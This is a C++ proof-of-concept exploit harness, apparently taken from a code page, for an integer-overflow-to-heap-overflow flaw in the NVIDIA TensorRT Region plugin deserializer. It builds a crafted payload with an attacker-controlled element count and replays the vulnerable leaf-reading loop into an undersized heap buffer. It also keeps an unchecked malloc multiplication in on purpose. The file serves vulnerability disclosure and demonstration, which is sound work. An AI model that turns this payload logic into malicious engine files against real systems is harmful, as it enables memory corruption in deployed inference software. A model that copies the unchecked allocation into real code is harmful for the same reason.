File size: 5,816 Bytes
2367784
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
/*
 * PoC: Integer Overflow -> Heap Overflow in TensorRT Region Plugin
 *
 * Affected: NVIDIA TensorRT OSS - plugin/regionPlugin/regionPlugin.cpp
 * Entry: RegionPluginCreator::deserializePlugin() -> Region::Region(buffer, len)
 * Trigger: Loading malicious .engine file containing Region_TRT plugin
 *
 * Build:  clang++ -fsanitize=address -g -O0 -o trigger trigger.cpp
 * Run:    ./trigger
 * Expect: ASan heap-buffer-overflow
 *
 * Ref: https://github.com/NVIDIA/TensorRT/blob/main/plugin/regionPlugin/regionPlugin.cpp
 */

#include <cstdlib>
#include <cstdint>
#include <cstring>
#include <cstdio>

/* ---- Extracted from TensorRT OSS regionPlugin.cpp (logic unchanged; annotations added for this PoC) ---- */

/**
 * Allocates raw, uninitialized storage for `count` objects of type T.
 *
 * The byte size is computed as `count * sizeof(T)` and handed straight to
 * malloc; neither the sign of `count` nor the product is validated. That
 * missing check is the flaw this PoC reproduces, so it is kept as-is.
 *
 * @param ptr   Receives whatever malloc returns (null on allocation failure).
 * @param count Number of T-sized elements requested.
 */
template <typename T>
void allocateChunk(T*& ptr, int32_t count)
{
    // BUG (kept on purpose): the multiplication is not checked for overflow.
    void* const raw = malloc(count * sizeof(T));
    ptr = static_cast<T*>(raw);
}

/**
 * Reads one value of type T from a byte cursor and advances the cursor.
 *
 * The bytes are copied with memcpy, so the source does not need to be
 * aligned for T. No bounds information is available here; the caller is
 * responsible for making sure at least sizeof(T) bytes remain.
 *
 * @param d Cursor into the serialized buffer; moved forward by sizeof(T).
 * @return  The value decoded from the bytes at the cursor's old position.
 */
template <typename T>
T read_val(char const*& d)
{
    char const* const src = d;
    d = src + sizeof(T);

    T out;
    memcpy(&out, src, sizeof(T));
    return out;
}

/**
 * Plain aggregate describing the softmax tree that the Region plugin
 * deserializer fills in. Only `n` and `leaf` are touched by this PoC; the
 * remaining members are kept so the layout matches the declaration the PoC
 * was taken from (their meaning is not shown in this file).
 */
struct softmaxTree
{
    int32_t* leaf;        // heap array written by the leaf-reading loop (n entries expected)
    int32_t n;            // element count, read directly from the serialized buffer
    int32_t* parent;      // unused in this PoC
    int32_t* child;       // unused in this PoC
    int32_t* group;       // unused in this PoC
    char** name;          // unused in this PoC
    int32_t groups;       // unused in this PoC
    int32_t* groupSize;   // unused in this PoC
    int32_t* groupOffset; // unused in this PoC
};

/* ---- Craft malicious payload ---- */

/**
 * PoC driver: builds a serialized Region plugin payload in memory, then
 * replays the deserialization steps against it so that the leaf-reading loop
 * writes past the end of an undersized heap buffer.
 *
 * The out-of-bounds write is intentional; under AddressSanitizer the process
 * is expected to abort inside the leaf loop. Allocation failures in the
 * harness itself are reported on stderr.
 *
 * @return 0 if the run completes (i.e. the overflow was not trapped),
 *         1 if the harness could not allocate its own buffers.
 */
int main()
{
    printf("=== TensorRT Region Plugin Heap Overflow PoC ===\n\n");

    /*
     * Payload layout (matches Region::Region serialization format):
     *   6 x int32_t  : C, H, W, num, classes, coords
     *   8 x bool     : presence flags
     *   int32_t      : smTreeTemp->n  (ATTACKER CONTROLLED)
     *   n x int32_t  : leaf data (read into undersized heap buffer)
     *
     * Vulnerability scenario:
     *   In the real code path, integer overflow makes malloc(n*4) return a
     *   tiny buffer when n is ~0x40000001 (n*4 wraps to 4 on a 32-bit
     *   multiply), and the leaf loop then writes n elements into it.
     *
     * For the ASan demo we reproduce the same effect directly: the payload
     * declares n = MALICIOUS_N (128) elements, but the leaf buffer is
     * allocated for only ALLOC_N (4) elements (16 bytes), so the copy loop
     * runs off the end of the allocation.
     */

    // We demonstrate two bugs:
    // Bug 1: No validation of n at all (any value accepted)
    // Bug 2: On 32-bit: integer overflow in malloc(n * sizeof(int32_t))

    // --- Build serialized buffer ---
    const int32_t MALICIOUS_N = 128;  // write 128 elements
    const int32_t ALLOC_N = 4;        // but only 4 elements worth of space

    // Total payload: header + flags + n + leaf_data
    const size_t payload_size = 6 * sizeof(int32_t) + 8 * sizeof(bool) + sizeof(int32_t)
                              + MALICIOUS_N * sizeof(int32_t);
    char* payload = static_cast<char*>(calloc(1, payload_size));
    if (payload == nullptr)
    {
        fprintf(stderr, "[-] Failed to allocate %zu-byte payload\n", payload_size);
        return 1;
    }
    char* p = payload;

    // Header: C=3, H=416, W=416, num=5, classes=80, coords=4
    const int32_t hdr[] = {3, 416, 416, 5, 80, 4};
    memcpy(p, hdr, sizeof(hdr));
    p += sizeof(hdr);

    // Presence flags: softmaxTree=true, leaf=true, rest=false
    const bool flags[] = {true, true, false, false, false, false, false, false};
    memcpy(p, flags, sizeof(flags));
    p += sizeof(flags);

    // n field (attacker controlled)
    memcpy(p, &MALICIOUS_N, sizeof(int32_t));
    p += sizeof(int32_t);

    // leaf data (fill with pattern)
    const int32_t pattern = 0x41414141;
    for (int32_t i = 0; i < MALICIOUS_N; i++)
    {
        memcpy(p, &pattern, sizeof(int32_t));
        p += sizeof(int32_t);
    }

    printf("[*] Payload size: %zu bytes\n", payload_size);
    printf("[*] smTreeTemp->n in payload: %d\n", MALICIOUS_N);

    // --- Simulate the vulnerable deserialization ---
    printf("[*] Simulating Region::Region(buffer, length)...\n\n");

    char const* d = payload;

    // Read header (same as regionPlugin.cpp L97-102). The values are not
    // needed by the PoC, so they are consumed only to advance the cursor.
    read_val<int32_t>(d); // C
    read_val<int32_t>(d); // H
    read_val<int32_t>(d); // W
    read_val<int32_t>(d); // num
    read_val<int32_t>(d); // classes
    read_val<int32_t>(d); // coords

    // Read flags (same as regionPlugin.cpp L103-110)
    const bool softmaxTreePresent = read_val<bool>(d);
    const bool leafPresent        = read_val<bool>(d);
    read_val<bool>(d); // parentPresent
    read_val<bool>(d); // childPresent
    read_val<bool>(d); // groupPresent
    read_val<bool>(d); // namePresent
    read_val<bool>(d); // groupSizePresent
    read_val<bool>(d); // groupOffsetPresent

    printf("[*] softmaxTreePresent=%d, leafPresent=%d\n",
           softmaxTreePresent, leafPresent);

    if (softmaxTreePresent)
    {
        softmaxTree* smTreeTemp = nullptr;
        allocateChunk(smTreeTemp, 1);  // regionPlugin.cpp L115
        if (smTreeTemp == nullptr)
        {
            // Harness failure, not the bug under test: bail out cleanly.
            fprintf(stderr, "[-] Failed to allocate softmaxTree\n");
            free(payload);
            return 1;
        }

        smTreeTemp->n = read_val<int32_t>(d);  // regionPlugin.cpp L117
        printf("[*] smTreeTemp->n = %d\n", smTreeTemp->n);

        if (leafPresent)
        {
            // KEY VULNERABILITY: allocate only ALLOC_N elements instead of n
            // This simulates integer overflow: malloc(0x40000001 * 4) = malloc(4)
            printf("[*] Simulating integer overflow: allocating %d elements "
                   "but writing %d\n", ALLOC_N, smTreeTemp->n);
            allocateChunk(smTreeTemp->leaf, ALLOC_N);  // tiny buffer!
            if (smTreeTemp->leaf == nullptr)
            {
                // Writing through a null pointer would crash for the wrong
                // reason and hide the overflow this PoC is meant to show.
                fprintf(stderr, "[-] Failed to allocate leaf buffer\n");
                free(smTreeTemp);
                free(payload);
                return 1;
            }
            // %p requires a void*; pass the pointer with an explicit conversion.
            printf("[*] malloc(%zu) returned %p\n",
                   static_cast<size_t>(ALLOC_N) * sizeof(int32_t),
                   static_cast<void*>(smTreeTemp->leaf));

            // regionPlugin.cpp L152-157: loop writes n elements
            printf("[*] Writing %d elements into %d-element buffer...\n",
                   smTreeTemp->n, ALLOC_N);
            for (int32_t i = 0; i < smTreeTemp->n; i++)
            {
                smTreeTemp->leaf[i] = read_val<int32_t>(d);  // HEAP OVERFLOW! (intentional)
            }

            printf("[!] Should not reach here - ASan should have caught it\n");
            free(smTreeTemp->leaf);
        }
        free(smTreeTemp);
    }

    free(payload);
    return 0;
}